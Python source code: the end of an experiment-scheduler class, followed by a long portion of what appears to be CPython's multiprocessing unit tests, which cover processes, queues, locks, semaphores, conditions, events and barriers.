self.launch_experiment(experiment_id)
self.logger.info('Experiment ' + str(experiment_id) + ' launched!!')
else:
self.logger.info('Queue empty.')
time.sleep(5)
def monitor_running_experiments(self):
"""Check periodically if there is space in the pool
by querying current running experiments."""
while True:
time.sleep(10)
running_list = self.dal.get_running_experiments()
self.experiments_running = len(running_list["running"])
def check_system(self):
"""
Check the execution state of the system.
The size of the pool, the number of experiments running and the
activation of the system itself are checked periodically in order to
manage the execution of the experiments.
"""
system_config = self.dal.get_system_parameters()
self.is_running = system_config['running']
self.experiments_limit = system_config['experiments_limit']
if not self.is_running:
status = (False, 'paused')
elif self.experiments_running >= self.experiments_limit:
status = (False, 'full')
else:
status = (True, 'activated')
return status
def launch_experiment(self, experiment_id):
"""Launch the experiments stored in the execution queue."""
self.logger.debug('Saving the launch time')
launch_time = datetime.datetime.utcnow()
self.dal.update_experiment_state(experiment_id, 'pool')
self.dal.update_experiment_launch_time(experiment_id, launch_time)
experiment_info = self.dal.get_experiment(experiment_id)
self.logger.debug('Saving experiment in execution list')
self.dal.save_running_experiment(experiment_info)
self.logger.info('Launching experiment ' + str(experiment_id))
experiment = Experiment(
experiment_info, self.kafka_server, self.db, self.orch)
experiment.start()
self.experiments_running += 1
threading.Thread(target=experiment.control).start()
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import test.support
import test.support.script_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.dummy
import multiprocessing.connection
import multiprocessing.managers
import multiprocessing.heap
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
def latin(s):
return s.encode('latin')
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # setting this True makes the tests take a lot longer
                      # and can sometimes cause non-serious failures because
                      # some calls block a bit longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
    # A negative timeout means block indefinitely: connection.wait()
    # treats a timeout of None as "no timeout".
    if timeout is not None and timeout < 0.0:
        timeout = None
    return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
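def _timing_wrapper_sketch():
    # Illustrative usage sketch (not invoked by the test suite): the wrapper
    # records the wall-clock duration in .elapsed -- roughly 0.05s here --
    # even when the wrapped call raises, thanks to the try/finally above.
    wrapped = TimingWrapper(time.sleep)
    wrapped(0.05)
    assert wrapped.elapsed is not None and wrapped.elapsed >= 0.0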
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
    # For the sanity of Windows users: fail loudly when someone tries to
    # pickle a test case, rather than crashing or freezing in multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore, falling back to implementation-private
# attributes when no public getter is available
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
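def _get_value_sketch():
    # Illustrative sketch (not invoked by the test suite): where
    # sem_getvalue() is not broken, get_value() reads the counter straight
    # off a multiprocessing semaphore; otherwise it falls back to private
    # attributes or raises NotImplementedError.
    sem = multiprocessing.Semaphore(2)
    if HAVE_GETVALUE:
        assert get_value(sem) == 2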
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
@classmethod
def _test_terminate(cls):
time.sleep(100)
def test_terminate(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
p.terminate()
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
#self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
sys.stderr = open(testfn, 'w')
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
sys.stderr = open(testfn, 'w')
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason, code in (([1, 2, 3], 1), ('ignore this', 1)):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, code)
with open(testfn, 'r') as f:
self.assertEqual(f.read().rstrip(), str(reason))
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
        # the values may be in the buffer but not yet in the pipe, so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
        # note that at this point the items may only be buffered, so the
        # process cannot shut down until the feeder thread has finished
        # pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# Tolerate a delta of 30 ms because of the bad clock resolution on
# Windows (usually 15.6 ms)
self.assertGreaterEqual(delta, 0.170)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
for i in range(10):
try:
if get_value(woken) == 6:
break
except NotImplementedError:
break
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=10))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(10))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 10)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
        # Removed temporarily, due to API shear: this does not
        # work with threading._Event objects (is_set == isSet).
        self.assertEqual(event.is_set(), False)
        # Removed: threading.Event.wait() returns the value of the __flag
        # instead of None -- API shear with the semaphore-backed mp.Event.
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class _DummyList
# for the same purpose (a usage sketch follows the class below).
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
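def _dummy_list_sketch():
    # Illustrative sketch (not invoked by the test suite): _DummyList
    # implements the list-as-atomic-counter idiom for processes -- append()
    # bumps a counter stored in shared heap memory under a lock, len() reads
    # it back, and pickling only carries the (wrapper, lock) pair.
    counter = _DummyList()
    counter.append(True)
    counter.append(True)
    assert len(counter) == 2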
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
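def _bunch_usage_sketch(namespace):
    # Illustrative sketch (not invoked by the test suite): start three
    # workers that each sleep briefly, then block until all have finished.
    # 'namespace' is any object providing Process/Event/DummyList, e.g. a
    # test-case instance as used by _TestBarrier.run_threads below.
    b = Bunch(namespace, time.sleep, (0.01,), 3)
    b.wait_for_finished()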
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
f(*args)
b.wait_for_finished()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
